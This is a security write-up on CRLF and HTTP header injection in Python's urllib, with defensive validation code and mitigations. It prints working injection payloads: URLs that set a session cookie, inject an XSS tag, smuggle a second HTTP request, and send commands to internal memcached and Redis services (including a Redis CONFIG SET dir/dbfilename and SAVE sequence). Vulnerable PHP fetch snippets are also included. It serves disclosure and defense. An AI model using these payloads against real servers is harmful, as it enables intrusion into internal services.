HTTP Header Injection in Python urllib
Contents
1. Overview
2. The urllib Bug
3. Attack Scenarios
4. Other Scenarios
5. Protections / Mitigations
1. Overview
Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.
Much like CRLF injection, the root cause of this urllib2/urllib bug is that HTTP is a weakly formatted layer-7 protocol and the library does not filter sensitive characters out of its input, so the injected bytes go straight onto the wire.
0x1: CRLF Injection
CRLF is short for "carriage return + line feed" (\r\n). In HTTP, the headers and the body are separated by two CRLFs, and the browser relies on that pair to locate and render the body. So once we control characters inside an HTTP header and can inject a line break, we can inject a session cookie or HTML of our own. This is why CRLF injection is also called HTTP Response Splitting (HRS).
0x2: CRLF Injection Examples
1. Injecting into a 302 redirect
A normal 302 redirect response looks like this
HTTP/1.1 302 Moved Temporarily
Date: Fri, Jun :: GMT
Content-Type: text/html
Content-Length:
Connection: close
Location: http://www.sina.com.cn
Now inject into the redirect target
http://www.sina.com.cn%0aSet-cookie:JSPSESSID%3Dwooyun
A line break has been injected, so the response now becomes
HTTP/1.1 302 Moved Temporarily
Date: Fri, Jun :: GMT
Content-Type: text/html
Content-Length:
Connection: close
Location: http://www.sina.com.cn
Set-cookie: JSPSESSID=wooyun
This sets a session cookie on the visitor, producing a session fixation vulnerability.
2. Injecting XSS
http://www.sina.com.cn%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>
Response
HTTP/1.1 302 Moved Temporarily
Date: Fri, Jun :: GMT
Content-Type: text/html
Content-Length:
Connection: close
<img src=1 onerror=alert(/xss/)>
The browser splits the HTTP message into head and body at the first CRLF pair and renders the body, so the injected tag is rendered and we get an XSS.
3. Injecting multiple HTTP requests
By placing a complete new HTTP request (or even a gopher-protocol request) after the injected CR/LF, the side that fetches the URL can be made to issue several requests.
Relevant Link:
http://drops.wooyun.org/papers/2466
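As an added example (not code from the original post), a small Python simulation of the 302 response splitting described above: the naive builder interpolates the redirect target into the header block, the hardened builder refuses control characters, and a browser-style parser shows the injected Set-cookie line being read as a real header. The target URL and cookie value are constructed.

```python
# Added example: server-side response splitting through a Location header.
# Sample inputs are constructed; the cookie name mirrors the post's payload.
BENIGN_TARGET = "http://www.example.com"
INJECTED_TARGET = "http://www.example.com\nSet-cookie: JSPSESSID=constructed"


def build_redirect_vulnerable(location: str) -> bytes:
    """Interpolate the redirect target into the header block without validation.

    This reproduces the flaw: a LF inside *location* terminates the Location
    line, and whatever follows is parsed as an additional header.
    """
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Content-Type: text/html\r\n"
        "Connection: close\r\n"
        f"Location: {location}\r\n"
        "\r\n"
    ).encode("latin-1")


def build_redirect_hardened(location: str) -> bytes:
    """Same response, but refuse any header value that carries CR, LF or
    another control byte instead of letting it reach the wire."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in location):
        raise ValueError("control character in Location header value")
    return build_redirect_vulnerable(location)


def header_names(raw: bytes) -> list:
    """Read the header block the way a browser does: everything before the
    first blank line, one header per line break (a bare LF counts too)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.splitlines()[1:]  # skip the status line
    return [ln.split(":", 1)[0].strip().lower() for ln in lines if ":" in ln]


if __name__ == "__main__":
    print(header_names(build_redirect_vulnerable(INJECTED_TARGET)))
    # → ['content-type', 'connection', 'location', 'set-cookie']
```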
2. The urllib Bug
The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes them, and includes the decoded bytes in the HTTP stream without validation or further encoding. This allows newline injection.
#!/usr/bin/env python3
import sys
import urllib
import urllib.error
import urllib.request

# The URL comes straight from the command line and goes straight to urlopen
url = sys.argv[1]
try:
    info = urllib.request.urlopen(url).info()
    print(info)
except urllib.error.URLError as e:
    print(e)
This script simply accepts a URL in a command line argument and attempts to fetch it.
./fetch.py http://114.215.190.203:12345/foo
A malicious hostname that injects a header:
./fetch.py http://114.215.190.203%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo
Here the attacker can fully control a new injected HTTP header.
The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to look up the appropriate hostname
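Added example, not code from the post or from CPython: a check that reproduces the decoding step the bug relied on (urllib percent-decoded the host[:port] it split out of the URL before copying it into the request line and Host header) and then validates the decoded value against a strict host grammar, so a CR, LF, NUL or space is caught before urlopen is ever called. All hostnames are constructed. Patched CPython releases reject such hosts themselves (http.client raises InvalidURL); a check like this lets an application fail closed regardless of interpreter version.

```python
import re
import urllib.request
from urllib.parse import urlsplit, unquote

# Constructed sample URLs (not from the post). "crlf" carries the same
# percent-encoded CRLF pattern the post demonstrates; "nul" hides a NUL byte.
SAMPLE_URLS = {
    "clean": "http://internal.example:12345/foo",
    "crlf": "http://internal.example%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo",
    "nul": "http://internal.example%00.attacker.example/foo",
    "ipv6": "http://[::1]:8080/foo",
}

# The decoded host[:port] must be an RFC 1123 name / IPv4 literal or a
# bracketed IPv6 literal, optionally followed by a numeric port. Nothing else.
_HOSTPORT_RE = re.compile(
    r"(?:\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(?::[0-9]{1,5})?"
)


def decoded_host(url: str) -> str:
    """Return host[:port] as the vulnerable urllib emitted it.

    urllib.request.Request percent-decoded the host it split out of the URL,
    so '%0d%0a' became a real CRLF inside the request line. Userinfo is
    dropped here so that only the host part is validated.
    """
    hostport = urlsplit(url).netloc.rpartition("@")[2]
    return unquote(hostport)


def host_is_safe(url: str) -> bool:
    """True only when the decoded host cannot carry protocol bytes."""
    if urlsplit(url).scheme not in ("http", "https"):
        return False
    decoded = decoded_host(url)
    # Reject CR, LF, NUL, space and every other control byte outright.
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in decoded):
        return False
    return _HOSTPORT_RE.fullmatch(decoded) is not None


def fetch_headers(url: str):
    """Guarded version of the post's fetch script: fail closed on a
    suspicious host, otherwise fetch and return the response headers."""
    if not host_is_safe(url):
        raise ValueError("refusing URL with unsafe host: %r" % decoded_host(url))
    return urllib.request.urlopen(url).info()
```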
3. Attack Scenarios
0x1: HTTP Header Injection and Request Smuggling
If an ordinary HTTP request sent by urllib looks like this
GET /foo HTTP/1.1
Accept-Encoding: identity
User-Agent: Python-urllib/3.4
Host: 127.0.0.1
Connection: close
Then an attacker could inject a whole extra HTTP request into the stream with URLs like
./fetch.py http://114.215.190.203%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo
0x2: Attacking memcached
Much like injecting into memcache through SSRF, HTTP header injection can likewise hijack the server side into opening TCP connections to internal redis and memcache instances, giving an intranet pivot.
In our case, if we could fool an internal Python application into fetching a URL for us, then we could easily access memcached instances. Consider the URL
./fetch.py http://114.215.190.203%0d%0aset%20foo%200%200%205%0d%0aABCDE%0d%0a:12345/foo
Read in light of the memcached protocol syntax, most of the above lines are syntax errors. However, memcached does not close the connection upon receiving bad commands. This allows attackers to inject commands anywhere in the request and have them honored. The above request produced the following response from memcached (which was configured with default settings from the Debian Linux package):
ERROR
ERROR
ERROR
ERROR
ERROR
STORED
ERROR
ERROR
0x3: Attacking Redis
./fetch.py http://114.215.190.203%0d%0aCONFIG%20SET%20dir%20%2ftmp%0d%0aCONFIG%20SET%20dbfilename%20evil%0d%0aSET%20foo%20bar%0d%0aSAVE%0d%0a:6379/foo
Relevant Link:
http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html
4. Other Scenarios
0x1: PHP URL-request libraries
1. CURL
<?php
if (isset($_GET['url']))
{
    // The user-supplied URL is handed to curl unchanged
    $link = $_GET['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 1);
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);
    echo $result;
}
?>
2. file_get_contents
<?php
$url = $_GET['url'];
$content = file_get_contents($url);
echo $content;
?>
3. fsockopen
PHP's URL-request libraries filter sensitive characters out of the parameters before issuing the remote request.
5. Protections / Mitigations
The PHP manual entry for header() notes:
Since PHP 4.4, this function prevents more than one header from being sent at once. This is a protection against header injection attacks.
Relevant Link:
http://php.net/manual/en/function.header.php
Copyright (c) 2016 LittleHann All rights reserved